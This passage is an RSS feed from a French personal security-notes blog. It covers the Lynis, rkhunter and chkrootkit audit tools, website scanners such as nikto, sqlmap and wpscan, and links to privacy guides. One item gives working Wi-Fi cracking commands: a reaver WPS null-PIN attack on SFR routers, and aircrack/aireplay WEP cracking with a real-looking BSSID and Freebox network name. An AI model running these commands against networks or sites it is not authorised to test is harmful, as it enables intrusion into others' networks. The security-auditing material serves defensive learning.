<?xml 
version="1.0" encoding="utf-8"?><?xml-stylesheet title="XSL formatting" type="text/xsl" href="https://dindoun.lautre.net/spip.php?page=backend.xslt" ?>
<rss version="2.0" 
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:atom="http://www.w3.org/2005/Atom"
>

<channel xml:lang="fr">
	<title>pense-b&#234;te de bruno sanchiz</title>
	<link>https://dindoun.lautre.net/</link>
	<description></description>
	<language>fr</language>
	<generator>SPIP - www.spip.net</generator>
	<atom:link href="https://dindoun.lautre.net/spip.php?id_rubrique=47&amp;page=backend" rel="self" type="application/rss+xml" />

	<image>
		<title>pense-b&#234;te de bruno sanchiz</title>
		<url>https://dindoun.lautre.net/local/cache-vignettes/L128xH128/favicon-68ee1.png?1762285646</url>
		<link>https://dindoun.lautre.net/</link>
		<height>128</height>
		<width>128</width>
	</image>



<item xml:lang="fr">
		<title>lynis</title>
		<link>https://dindoun.lautre.net/spip.php?article667</link>
		<guid isPermaLink="true">https://dindoun.lautre.net/spip.php?article667</guid>
		<dc:date>2025-10-28T20:28:53Z</dc:date>
		<dc:format>text/html</dc:format>
		<dc:language>fr</dc:language>
		<dc:creator>bruno</dc:creator>



		<description>
&lt;p&gt;Installation &lt;br class='autobr' /&gt;
sudo apt-get install lynis Exemple d'utilisation &lt;br class='autobr' /&gt;
sudo lynis audit system
&lt;br class='autobr' /&gt;
Voir aussi &#034;s&#233;curit&#233;&#034; informatique sous linux Lecture du r&#233;sultat &lt;br class='autobr' /&gt;
Le pr&#233;fixe (KRNL, SSH, PKGS, etc.) indique la cat&#233;gorie ou le composant concern&#233; : KRNL = Kernel (noyau du syst&#232;me) SSH = Secure Shell (acc&#232;s &#224; distance s&#233;curis&#233;) PKGS = Packages (gestion de paquets/applications) DEB = Debian (sp&#233;cifique &#224; Debian ou Ubuntu) AUTH = Authentication (authentification) FILE = File System (&#8230;)&lt;/p&gt;


-
&lt;a href="https://dindoun.lautre.net/spip.php?rubrique47" rel="directory"&gt;&#034;s&#233;curit&#233;&#034; informatique&lt;/a&gt;


		</description>


 <content:encoded>&lt;div class='rss_texte'&gt;&lt;h2 class=&#034;spip&#034;&gt;Installation &lt;/h2&gt;
&lt;p&gt;&lt;code class='spip_code spip_code_inline' dir='ltr'&gt;sudo apt-get install lynis&lt;/code&gt;&lt;/p&gt;
&lt;h2 class=&#034;spip&#034;&gt;Exemple d'utilisation &lt;/h2&gt;
&lt;p&gt;&lt;code class='spip_code spip_code_inline' dir='ltr'&gt;sudo lynis audit system&lt;/code&gt;&lt;br class='autobr' /&gt;
Voir aussi &lt;a href='https://dindoun.lautre.net/spip.php?article172#lynis' class=&#034;spip_in&#034;&gt;&#034;s&#233;curit&#233;&#034; informatique sous linux&lt;/a&gt;&lt;/p&gt;
&lt;h2 class=&#034;spip&#034;&gt;Lecture du r&#233;sultat&lt;/h2&gt;
&lt;p&gt;Le pr&#233;fixe (KRNL, SSH, PKGS, etc.) indique la cat&#233;gorie ou le composant concern&#233; :&lt;/p&gt;
&lt;ul class=&#034;spip&#034; role=&#034;list&#034;&gt;&lt;li&gt; KRNL = Kernel (noyau du syst&#232;me)&lt;/li&gt;&lt;li&gt; SSH = Secure Shell (acc&#232;s &#224; distance s&#233;curis&#233;)&lt;/li&gt;&lt;li&gt; PKGS = Packages (gestion de paquets/applications)&lt;/li&gt;&lt;li&gt; DEB = Debian (sp&#233;cifique &#224; Debian ou Ubuntu)&lt;/li&gt;&lt;li&gt; AUTH = Authentication (authentification)&lt;/li&gt;&lt;li&gt; FILE = File System (syst&#232;me de fichiers)&lt;/li&gt;&lt;/ul&gt;&lt;h2 class=&#034;spip&#034;&gt;Lire le r&#233;sultat pour choisir ce qu'il faut faire&lt;/h2&gt;
&lt;p&gt;URGENTS : &lt;code class='spip_code spip_code_inline' dir='ltr'&gt;cat /var/log/lynis.log |grep Warning&lt;/code&gt;&lt;br class='autobr' /&gt;
A FAIRE : &lt;code class='spip_code spip_code_inline' dir='ltr'&gt;sudo cat /var/log/lynis.log |grep Suggestion&lt;/code&gt;&lt;/p&gt;&lt;/div&gt;
		
		</content:encoded>


		

	</item>
<item xml:lang="fr">
		<title>s&#233;curit&#233;s informatiques</title>
		<link>https://dindoun.lautre.net/spip.php?article581</link>
		<guid isPermaLink="true">https://dindoun.lautre.net/spip.php?article581</guid>
		<dc:date>2024-04-11T10:57:06Z</dc:date>
		<dc:format>text/html</dc:format>
		<dc:language>fr</dc:language>
		<dc:creator>bruno</dc:creator>



		<description>
&lt;p&gt;r&#233;seaux sociaux / messageries instantan&#233;es extinction rebellion (xr) &lt;br class='autobr' /&gt;
https://extinctionrebellion.fr/ressources/ &lt;br class='autobr' /&gt;
Protection des donn&#233;es personnelles informatiques &lt;br class='autobr' /&gt;
Comment verrouiller son t&#233;l&#233;phone &lt;br class='autobr' /&gt;
Manuel de s&#233;curit&#233; informatique nothing to hide et matrix.de &lt;br class='autobr' /&gt;
prot&#233;ger l'information
&lt;br class='autobr' /&gt;
framateam &lt;br class='autobr' /&gt;
quelle messagerie s&#233;curis&#233;e choisir&lt;/p&gt;


-
&lt;a href="https://dindoun.lautre.net/spip.php?rubrique47" rel="directory"&gt;&#034;s&#233;curit&#233;&#034; informatique&lt;/a&gt;


		</description>


 <content:encoded>&lt;div class='rss_texte'&gt;&lt;p&gt;&lt;a href='https://dindoun.lautre.net/spip.php?article390' class=&#034;spip_in&#034;&gt;r&#233;seaux sociaux / messageries instantan&#233;es &lt;/a&gt;&lt;/p&gt;
&lt;h2 class=&#034;spip&#034;&gt;extinction rebellion (xr)&lt;/h2&gt;
&lt;p&gt;&lt;a href=&#034;https://extinctionrebellion.fr/ressources/&#034; class=&#034;spip_url spip_out auto&#034; rel=&#034;nofollow external&#034;&gt;https://extinctionrebellion.fr/ressources/&lt;/a&gt;&lt;/p&gt;
&lt;div class='spip_document_723 spip_document spip_documents spip_document_file'&gt;
&lt;figure class=&#034;spip_doc_inner&#034;&gt;
&lt;a href='https://dindoun.lautre.net/IMG/pdf/guide_de_protection_numerique_o_nothing2hide_-_zeka_2019_.pdf' class=&#034; spip_doc_lien&#034; title='PDF - 627.9 kio' type=&#034;application/pdf&#034;&gt;&lt;img src='https://dindoun.lautre.net/local/cache-vignettes/L64xH64/pdf-b8aed.svg?1775240275' width='64' height='64' alt='' /&gt;&lt;/a&gt;
&lt;/figure&gt;
&lt;/div&gt;
&lt;p&gt;Protection des donn&#233;es personnelles informatiques&lt;/p&gt;
&lt;div class='spip_document_724 spip_document spip_documents spip_document_file'&gt;
&lt;figure class=&#034;spip_doc_inner&#034;&gt;
&lt;a href='https://dindoun.lautre.net/IMG/pdf/guide_pratique_-_securite_des_donnees.pdf' class=&#034; spip_doc_lien&#034; title='PDF - 342.1 kio' type=&#034;application/pdf&#034;&gt;&lt;img src='https://dindoun.lautre.net/local/cache-vignettes/L64xH64/pdf-b8aed.svg?1775240275' width='64' height='64' alt='' /&gt;&lt;/a&gt;
&lt;/figure&gt;
&lt;/div&gt;
&lt;p&gt;Comment verrouiller son t&#233;l&#233;phone&lt;/p&gt;
&lt;div class='spip_document_725 spip_document spip_documents spip_document_file'&gt;
&lt;figure class=&#034;spip_doc_inner&#034;&gt;
&lt;a href='https://dindoun.lautre.net/IMG/pdf/verrouillagetelephone.pdf' class=&#034; spip_doc_lien&#034; title='PDF - 649.8 kio' type=&#034;application/pdf&#034;&gt;&lt;img src='https://dindoun.lautre.net/local/cache-vignettes/L64xH64/pdf-b8aed.svg?1775240275' width='64' height='64' alt='' /&gt;&lt;/a&gt;
&lt;/figure&gt;
&lt;/div&gt;
&lt;p&gt;Manuel de s&#233;curit&#233; informatique&lt;/p&gt;
&lt;div class='spip_document_726 spip_document spip_documents spip_document_file'&gt;
&lt;figure class=&#034;spip_doc_inner&#034;&gt;
&lt;a href='https://dindoun.lautre.net/IMG/pdf/secuinfo.pdf' class=&#034; spip_doc_lien&#034; title='PDF - 77 kio' type=&#034;application/pdf&#034;&gt;&lt;img src='https://dindoun.lautre.net/local/cache-vignettes/L64xH64/pdf-b8aed.svg?1775240275' width='64' height='64' alt='' /&gt;&lt;/a&gt;
&lt;/figure&gt;
&lt;/div&gt;&lt;h2 class=&#034;spip&#034;&gt;nothing to hide et matrix.de&lt;/h2&gt;
&lt;p&gt;&lt;a href=&#034;https://nothing2hide.org/fr/&#034; class=&#034;spip_out&#034; rel=&#034;external&#034;&gt;prot&#233;ger l'information&lt;/a&gt;&lt;br class='autobr' /&gt;
&lt;a href=&#034;https://framateam.org&#034; class=&#034;spip_out&#034; rel=&#034;external&#034;&gt;framateam&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href=&#034;https://nothing2hide.org/fr/2024/02/15/whatsapp-element-signal-telegram-olvid-quelle-messagerie-securisee-choisir/&#034; class=&#034;spip_out&#034; rel=&#034;external&#034;&gt;quelle messagerie s&#233;curis&#233;e choisir&lt;/a&gt;&lt;/p&gt;
&lt;div class='spip_document_727 spip_document spip_documents spip_document_file'&gt;
&lt;figure class=&#034;spip_doc_inner&#034;&gt;
&lt;a href='https://dindoun.lautre.net/IMG/pdf/messenger-matrix_o_kuketz_it-security_blog.pdf' class=&#034; spip_doc_lien&#034; title='PDF - 75.1 kio' type=&#034;application/pdf&#034;&gt;&lt;img src='https://dindoun.lautre.net/local/cache-vignettes/L64xH64/pdf-b8aed.svg?1775240275' width='64' height='64' alt='' /&gt;&lt;/a&gt;
&lt;/figure&gt;
&lt;/div&gt;&lt;/div&gt;
		
		</content:encoded>


		

	</item>
<item xml:lang="fr">
		<title>s&#233;curit&#233; de son site internet</title>
		<link>https://dindoun.lautre.net/spip.php?article510</link>
		<guid isPermaLink="true">https://dindoun.lautre.net/spip.php?article510</guid>
		<dc:date>2023-05-05T01:06:22Z</dc:date>
		<dc:format>text/html</dc:format>
		<dc:language>fr</dc:language>
		<dc:creator>bruno</dc:creator>


		<dc:subject>s&#233;curit&#233; informatique</dc:subject>

		<description>
&lt;p&gt;tests automatiques de sites webs et de trous de s&#233;curit&#233; sudo apt-get install nikto sqlmap whatweb wig wapiti testssl.sh nmap curl bind9-dnsutils &lt;br class='autobr' /&gt;
test de site wordpress (kali) wpscan &#8212;update &amp;amp ;&amp;amp ; wpscan &#8212;url DOMAIN.COM -e p,vt,u &lt;br class='autobr' /&gt;
outil d'audit de la s&#233;curit&#233; des serveurs Web. Il est con&#231;u pour rechercher divers fichiers, configurations et programmes par d&#233;faut et non s&#233;curis&#233;s sur des serveurs Web de tout type. apt-get install nikto nikto -h https://DOMAIN.COM (&#8230;)&lt;/p&gt;


-
&lt;a href="https://dindoun.lautre.net/spip.php?rubrique47" rel="directory"&gt;&#034;s&#233;curit&#233;&#034; informatique&lt;/a&gt;

/ 
&lt;a href="https://dindoun.lautre.net/spip.php?mot172" rel="tag"&gt;s&#233;curit&#233; informatique&lt;/a&gt;

		</description>


 <content:encoded>&lt;div class='rss_texte'&gt;&lt;p&gt;tests automatiques de sites webs et de trous de s&#233;curit&#233;&lt;br class='autobr' /&gt;
&lt;code class='spip_code spip_code_inline' dir='ltr'&gt;sudo apt-get install nikto sqlmap whatweb wig wapiti testssl.sh nmap curl bind9-dnsutils&lt;/code&gt;&lt;/p&gt;
&lt;h2 class=&#034;spip&#034;&gt;test de site wordpress (kali) &lt;/h2&gt;
&lt;p&gt;&lt;code class='spip_code spip_code_inline' dir='ltr'&gt;wpscan --update &amp;&amp; wpscan --url DOMAIN.COM -e p,vt,u&lt;/code&gt;&lt;/p&gt;
&lt;h2 class=&#034;spip&#034;&gt;outil d'audit de la s&#233;curit&#233; des serveurs Web. &lt;/h2&gt;
&lt;p&gt;Il est con&#231;u pour rechercher divers fichiers, configurations et programmes par d&#233;faut et non s&#233;curis&#233;s sur des serveurs Web de tout type.&lt;br class='autobr' /&gt;
&lt;code class='spip_code spip_code_inline' dir='ltr'&gt;apt-get install nikto&lt;/code&gt;&lt;br class='autobr' /&gt;
&lt;code class='spip_code spip_code_inline' dir='ltr'&gt;nikto -h https://DOMAIN.COM&lt;/code&gt;&lt;/p&gt;
&lt;h2 class=&#034;spip&#034;&gt;vuln&#233;rabilit&#233; d'injection SQL&lt;/h2&gt;
&lt;p&gt;&lt;code class='spip_code spip_code_inline' dir='ltr'&gt;apt-get install sqlmap&lt;/code&gt;&lt;br class='autobr' /&gt;
&lt;code class='spip_code spip_code_inline' dir='ltr'&gt;sqlmap -u https://DOMAIN.COM --level=0 &#224; 6&lt;/code&gt;&lt;/p&gt;
&lt;h2 class=&#034;spip&#034;&gt;d&#233;couvrir les technologies web d'un site web&lt;/h2&gt;
&lt;p&gt;&lt;code class='spip_code spip_code_inline' dir='ltr'&gt;apt-get install whatweb&lt;/code&gt;&lt;/p&gt;
&lt;ul class=&#034;spip&#034; role=&#034;list&#034;&gt;&lt;li&gt; whatweb &lt;a href=&#034;https://DOMAIN.COM&#034; class=&#034;spip_url spip_out auto&#034; rel=&#034;nofollow external&#034;&gt;https://DOMAIN.COM&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;h2 class=&#034;spip&#034;&gt;informations sur les applications Web&lt;/h2&gt;&lt;ul class=&#034;spip&#034; role=&#034;list&#034;&gt;&lt;li&gt; &lt;code class='spip_code spip_code_inline' dir='ltr'&gt;apt-get install wig&lt;/code&gt;&lt;br class='autobr' /&gt;
&lt;code class='spip_code spip_code_inline' dir='ltr'&gt;wig https://DOMAIN.COM&lt;/code&gt;&lt;/li&gt;&lt;li&gt; wapiti - A web application vulnerability scanner in Python&lt;br class='autobr' /&gt;
&lt;code class='spip_code spip_code_inline' dir='ltr'&gt;wapiti -u https://DOMAIN.COM&lt;/code&gt;&lt;/li&gt;&lt;/ul&gt;&lt;h2 class=&#034;spip&#034;&gt;V&#233;rification de la configuration du certificat SSL&lt;/h2&gt;
&lt;p&gt;&lt;code class='spip_code spip_code_inline' dir='ltr'&gt;sudo apt-get install testssl.sh&lt;/code&gt;&lt;br class='autobr' /&gt;
&lt;code class='spip_code spip_code_inline' dir='ltr'&gt;testssl SITE.COM&lt;/code&gt;&lt;/p&gt;
&lt;h2 class=&#034;spip&#034;&gt;trouver des ports ouverts&lt;/h2&gt;
&lt;p&gt;&lt;code class='spip_code spip_code_inline' dir='ltr'&gt;apt-get install nmap&lt;/code&gt;&lt;br class='autobr' /&gt;
&lt;code class='spip_code spip_code_inline' dir='ltr'&gt;nmap SITE.COM&lt;/code&gt;&lt;/p&gt;
&lt;h2 class=&#034;spip&#034;&gt;afficher les en-t&#234;tes HTTP&lt;/h2&gt;
&lt;p&gt;&lt;code class='spip_code spip_code_inline' dir='ltr'&gt;apt-get install curl&lt;/code&gt;&lt;br class='autobr' /&gt;
Les en-t&#234;tes HTTP peuvent contenir des informations sur la redirection, le serveur, etc. Vous pouvez afficher les en-t&#234;tes HTTP avec la commande suivante :&lt;br class='autobr' /&gt;
&lt;code class='spip_code spip_code_inline' dir='ltr'&gt;curl -I SITE.COM&lt;/code&gt;&lt;/p&gt;
&lt;h2 class=&#034;spip&#034;&gt;trouver l'adresse IP du site&lt;/h2&gt;
&lt;p&gt;&lt;code class='spip_code spip_code_inline' dir='ltr'&gt;apt-get install bind9-dnsutils&lt;/code&gt;&lt;br class='autobr' /&gt;
&lt;code class='spip_code spip_code_inline' dir='ltr'&gt;dig SITE.COM +short&lt;/code&gt;&lt;/p&gt;
&lt;h2 class=&#034;spip&#034;&gt;conna&#238;tre tous les enregistrements DNS du site&lt;/h2&gt;
&lt;p&gt;&lt;code class='spip_code spip_code_inline' dir='ltr'&gt;dig SITE.COM ANY&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;non essay&#233;s :&lt;/p&gt;
&lt;ul class=&#034;spip&#034; role=&#034;list&#034;&gt;&lt;li&gt; forensics-all&lt;/li&gt;&lt;/ul&gt;&lt;hr class=&#034;spip&#034; /&gt;
&lt;p&gt;&lt;a id=&#034;DOCs&#034;&gt;&lt;/a&gt;&lt;br class='autobr' /&gt;
&lt;a href=&#034;https://fr.linux-console.net/?p=8495&#034; class=&#034;spip_url spip_out auto&#034; rel=&#034;nofollow external&#034;&gt;https://fr.linux-console.net/?p=8495&lt;/a&gt;&lt;br class='autobr' /&gt;
&lt;a href=&#034;https://www.tutorialspoint.com/kali_linux/kali_linux_website_penetration_testing.htm&#034; class=&#034;spip_url spip_out auto&#034; rel=&#034;nofollow external&#034;&gt;https://www.tutorialspoint.com/kali_linux/kali_linux_website_penetration_testing.htm&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;
		
		</content:encoded>


		

	</item>
<item xml:lang="fr">
		<title>box crackable et solution</title>
		<link>https://dindoun.lautre.net/spip.php?article194</link>
		<guid isPermaLink="true">https://dindoun.lautre.net/spip.php?article194</guid>
		<dc:date>2017-08-15T00:43:34Z</dc:date>
		<dc:format>text/html</dc:format>
		<dc:language>fr</dc:language>
		<dc:creator>bruno</dc:creator>


		<dc:subject>s&#233;curit&#233; informatique</dc:subject>

		<description>
&lt;p&gt;http://www.crack-wifi.com/forum/topic-12166-0day-crack-box-sfr-nb6v-en-deux-secondes-par-pin-null.html : installation : sudo apt-get install libpcap0.8-dev git clone https://github.com/t6x/reaver-wps-fork-t6x.git cd reaver* &amp;&amp; cd src &amp;&amp; ./configure &amp;&amp; sudo make install Ce qui donne : install -D -m 755 wash /usr/local/bin/wash install -D -m 755 reaver /usr/local/bin/reaver install -d /usr/local/var/lib/reaver utilisation sur une mac 24:95:04... : commencer par (&#8230;)&lt;/p&gt;


-
&lt;a href="https://dindoun.lautre.net/spip.php?rubrique47" rel="directory"&gt;&#034;s&#233;curit&#233;&#034; informatique&lt;/a&gt;

/ 
&lt;a href="https://dindoun.lautre.net/spip.php?mot172" rel="tag"&gt;s&#233;curit&#233; informatique&lt;/a&gt;

		</description>


 <content:encoded>&lt;div class='rss_texte'&gt;&lt;p&gt;&lt;a href=&#034;http://www.crack-wifi.com/forum/topic-12166-0day-crack-box-sfr-nb6v-en-deux-secondes-par-pin-null.html&#034; class=&#034;spip_url spip_out auto&#034; rel=&#034;nofollow external&#034;&gt;http://www.crack-wifi.com/forum/topic-12166-0day-crack-box-sfr-nb6v-en-deux-secondes-par-pin-null.html&lt;/a&gt; :&lt;/p&gt;
&lt;ul class=&#034;spip&#034; role=&#034;list&#034;&gt;&lt;li&gt; installation : &lt;textarea readonly='readonly' cols='40' rows='8' class='spip_cadre spip_cadre_block' dir='ltr'&gt;sudo apt-get install libpcap0.8-dev git clone https://github.com/t6x/reaver-wps-fork-t6x.git cd reaver* &amp;&amp; cd src &amp;&amp; ./configure &amp;&amp; sudo make install Ce qui donne : install -D -m 755 wash /usr/local/bin/wash install -D -m 755 reaver /usr/local/bin/reaver install -d /usr/local/var/lib/reaver&lt;/textarea&gt;&lt;/li&gt;&lt;li&gt; utilisation sur une mac 24:95:04... :
&lt;ul class=&#034;spip&#034; role=&#034;list&#034;&gt;&lt;li&gt; commencer par &#233;ventuellement &lt;code class='spip_code spip_code_inline' dir='ltr'&gt;sudo airmon-ng&lt;/code&gt; un &lt;code class='spip_code spip_code_inline' dir='ltr'&gt;sudo airmon-ng start wlan0&lt;/code&gt; puis &lt;code class='spip_code spip_code_inline' dir='ltr'&gt;sudo airmon-ng check kill&lt;/code&gt;&lt;/li&gt;&lt;li&gt; &lt;code class='spip_code spip_code_inline' dir='ltr'&gt;wash -i mon2 &lt;/code&gt; ou &lt;code class='spip_code spip_code_inline' dir='ltr'&gt;airodump-ng --write tuto mon0&lt;/code&gt;qui donne plus&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;/ul&gt;&lt;ul class=&#034;spip&#034; role=&#034;list&#034;&gt;&lt;li&gt;
&lt;ul class=&#034;spip&#034; role=&#034;list&#034;&gt;&lt;li&gt; &lt;code class='spip_code spip_code_inline' dir='ltr'&gt;sudo reaver -i wlan0 -b 24:95:04... -p &#034;&#034; -vv -c 6&lt;/code&gt;&lt;/li&gt;&lt;li&gt; code informatif :&lt;code class='spip_code spip_code_inline' dir='ltr'&gt; # wash -i wlan0 -j -c 9&lt;/code&gt;&lt;/li&gt;&lt;li&gt; &lt;code class='spip_code spip_code_inline' dir='ltr'&gt; # wash -i wlan0 -s&lt;/code&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr class=&#034;spip&#034; /&gt;
&lt;p&gt;rappel avec aircrack ( cl&#233; wep )&lt;br class='autobr' /&gt;
&lt;code class='spip_code spip_code_inline' dir='ltr'&gt;sudo airmon-ng &lt;/code&gt;&lt;/p&gt; &lt;textarea readonly='readonly' cols='40' rows='2' class='spip_cadre spip_cadre_block' dir='ltr'&gt;Interface	Chipset Driver wlan1 Ralink 2573 USB	rt73usb - [phy7]&lt;/textarea&gt;
&lt;p&gt;&lt;code class='spip_code spip_code_inline' dir='ltr'&gt;sudo airmon-ng start wlan1&lt;/code&gt;&lt;/p&gt; &lt;textarea readonly='readonly' cols='40' rows='4' class='spip_cadre spip_cadre_block' dir='ltr'&gt;Interface	Chipset Driver wlan1 Ralink 2573 USB	rt73usb - [phy7] (monitor mode enabled on mon0)&lt;/textarea&gt;
&lt;p&gt;&lt;code class='spip_code spip_code_inline' dir='ltr'&gt;sudo airodump-ng --write tuto mon0&lt;/code&gt;va cr&#233;er des fichiers tuto-[0-9]*.cap tuto-[0-9]*.csv tuto-[0-9]*.kismet.csv tuto-[0-9]*.netxml&lt;/p&gt;
&lt;p&gt;On peut alors pr&#233;ciser channel, BSSID :&lt;br class='autobr' /&gt;
&lt;code class='spip_code spip_code_inline' dir='ltr'&gt;channel=1;BSSID=&#034;C2:5E:2F:26:AA:BC&#034;;&lt;/code&gt; et &lt;code class='spip_code spip_code_inline' dir='ltr'&gt;airodump-ng --write tuto --channel $channel --bssid $BSSID mon0&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;On peut alors pr&#233;ciser channel, BSSID, ESSID, STATION :&lt;br class='autobr' /&gt;
&lt;code class='spip_code spip_code_inline' dir='ltr'&gt;STATION=&#034;00:13:02:97:C7:B5&#034;; ESSID=&#034;freeboxvieuxpalais&#034;;channel=1;BSSID=&#034;C2:5E:2F:26:AA:BC&#034;;&lt;/code&gt; &lt;code class='spip_code spip_code_inline' dir='ltr'&gt;sudo aireplay-ng -3 -e $ESSID -b $BSSID -h $STATION mon0&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;puis&lt;br class='autobr' /&gt;
&lt;code class='spip_code spip_code_inline' dir='ltr'&gt;aircrack-ng -z tuto01.cap&lt;/code&gt;&lt;/p&gt;&lt;/div&gt;
		
		</content:encoded>


		

	</item>
<item xml:lang="fr">
		<title>&#034;s&#233;curit&#233;&#034; informatique sous linux</title>
		<link>https://dindoun.lautre.net/spip.php?article172</link>
		<guid isPermaLink="true">https://dindoun.lautre.net/spip.php?article172</guid>
		<dc:date>2017-07-03T01:24:33Z</dc:date>
		<dc:format>text/html</dc:format>
		<dc:language>fr</dc:language>
		<dc:creator>bruno</dc:creator>


		<dc:subject>installation</dc:subject>
		<dc:subject>s&#233;curit&#233; informatique</dc:subject>

		<description>
&lt;p&gt;Installer les programmes suivants pour renforcer : &lt;br class='autobr' /&gt;
sudo apt-get install libpam-tmpdir apt-listbugs apt-listchanges needrestart Sous linux on peut utiliser les programmes suivants : &lt;br class='autobr' /&gt;
wapiti wapiti - analyseur de vuln&#233;rabilit&#233;s d'application web wapiti -u http://pascale.landais.free.fr &lt;br class='autobr' /&gt;
rkhunter installation : apt-get install rkhunter utilisation : rkhunter &#8212;propupd &amp;amp ;&amp;amp ; rkhunter -c et pour plus de pr&#233;cisions apr&#232;s le test : grep &#034;Warning&#034; (&#8230;)&lt;/p&gt;


-
&lt;a href="https://dindoun.lautre.net/spip.php?rubrique47" rel="directory"&gt;&#034;s&#233;curit&#233;&#034; informatique&lt;/a&gt;

/ 
&lt;a href="https://dindoun.lautre.net/spip.php?mot41" rel="tag"&gt;installation&lt;/a&gt;, 
&lt;a href="https://dindoun.lautre.net/spip.php?mot172" rel="tag"&gt;s&#233;curit&#233; informatique&lt;/a&gt;

		</description>


 <content:encoded>&lt;img src='https://dindoun.lautre.net/local/cache-vignettes/L44xH38/cadenas-69818.jpg?1776590472' class='spip_logo spip_logo_right' width='44' height='38' alt=&#034;&#034; /&gt;
		&lt;div class='rss_texte'&gt;&lt;h2 class=&#034;spip&#034;&gt;Installer les programmes suivants pour renforcer :&lt;/h2&gt;
&lt;p&gt;&lt;code class='spip_code spip_code_inline' dir='ltr'&gt;sudo apt-get install libpam-tmpdir apt-listbugs apt-listchanges needrestart&lt;/code&gt;&lt;/p&gt;
&lt;hr class=&#034;spip&#034; /&gt;
&lt;p&gt;Sous linux on peut utiliser les programmes suivants :&lt;/p&gt;
&lt;h2 class=&#034;spip&#034;&gt;wapiti&lt;/h2&gt;
&lt;p&gt;wapiti - analyseur de vuln&#233;rabilit&#233;s d'application web&lt;br class='autobr' /&gt;
wapiti -u &lt;a href=&#034;http://pascale.landais.free.fr&#034; class=&#034;spip_url spip_out auto&#034; rel=&#034;nofollow external&#034;&gt;http://pascale.landais.free.fr&lt;/a&gt;&lt;/p&gt;
&lt;h2 class=&#034;spip&#034;&gt;rkhunter&lt;/h2&gt;&lt;ul class=&#034;spip&#034; role=&#034;list&#034;&gt;&lt;li&gt; installation : &lt;code class='spip_code spip_code_inline' dir='ltr'&gt;apt-get install rkhunter&lt;/code&gt;&lt;/li&gt;&lt;li&gt; utilisation : &lt;code class='spip_code spip_code_inline' dir='ltr'&gt;rkhunter --propupd &amp;&amp; rkhunter -c&lt;/code&gt; et pour plus de pr&#233;cisions apr&#232;s le test : &lt;code class='spip_code spip_code_inline' dir='ltr'&gt;grep &#034;Warning&#034; /var/log/rkhunter.log&lt;/code&gt;&lt;/li&gt;&lt;li&gt; r&#233;sultats :
&lt;ul class=&#034;spip&#034; role=&#034;list&#034;&gt;&lt;li&gt; Warnings de type hidden files &#224; v&#233;rifier un par un&lt;/li&gt;&lt;li&gt; PermitRootLogin : &lt;i&gt;PermitRootLogin without-password&lt;/i&gt; avec &lt;i&gt;UsePAM yes&lt;/i&gt; dans /etc/ssh/sshd_config semble normal&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;/ul&gt;&lt;h2 class=&#034;spip&#034;&gt;chkrootkit&lt;/h2&gt;&lt;ul class=&#034;spip&#034; role=&#034;list&#034;&gt;&lt;li&gt; installation : &lt;code class='spip_code spip_code_inline' dir='ltr'&gt;apt-get install chkrootkit&lt;/code&gt; et pour un test chaque jour &lt;code&gt;sed 's/RUN_DAILY=&#034;false&#034;/RUN_DAILY=&#034;true&#034;/' -i /etc/chkrootkit.conf&lt;/code&gt;&lt;/li&gt;&lt;li&gt; utilisation : &lt;code class='spip_code spip_code_inline' dir='ltr'&gt;chkrootkit&lt;/code&gt;&lt;/li&gt;&lt;li&gt; r&#233;sultats :
&lt;ul class=&#034;spip&#034; role=&#034;list&#034;&gt;&lt;li&gt; The following suspicious files and directories were found : beaucoup de fichiers commen&#231;ant par &#034;.&#034; pas n&#233;cessairement un probl&#232;me.&lt;/li&gt;&lt;li&gt; &lt;code class='spip_code spip_code_inline' dir='ltr'&gt;Checking chkutmp'... The tty of the following user process(es) were not found in /var/run/utmp ! ! RUID PID TTY CMD&lt;/code&gt; ! root 3332 tty7 /usr/bin/X :0 -seat seat0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch&lt;br class='autobr' /&gt;
chkutmp : nothing deleted&lt;code class='spip_code spip_code_inline' dir='ltr'&gt;. Les commandes ``w&lt;/code&gt; &lt;code class='spip_code spip_code_inline' dir='ltr'&gt;readlink -f /proc/3332/exe&lt;/code&gt;et &lt;code class='spip_code spip_code_inline' dir='ltr'&gt;readlink -f /usr/bin/X&lt;/code&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;/ul&gt;
&lt;p&gt;&lt;a id=&#034;lynis&#034;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2 class=&#034;spip&#034;&gt;lynis&lt;/h2&gt;
&lt;p&gt;Voir aussi &lt;a href='https://dindoun.lautre.net/spip.php?article667' class=&#034;spip_in&#034;&gt;lynis&lt;/a&gt;&lt;br class='autobr' /&gt;
&lt;code class='spip_code spip_code_inline' dir='ltr'&gt;apt-get install lynis&lt;/code&gt;&lt;br class='autobr' /&gt;
&lt;code class='spip_code spip_code_inline' dir='ltr'&gt;lynis audit system&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Voir en particulier les suggestions : installer les paquets propos&#233;s&lt;/p&gt;
&lt;p&gt;par exemple : a&lt;code class='spip_code spip_code_inline' dir='ltr'&gt;pt-get install debian-goodies libapache2-mod-evasive libapache2-mod-qos libapache2-modsecurity&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Default umask in /etc/login.defs /etc/init.d/rc could be more strict like 027&lt;/p&gt;
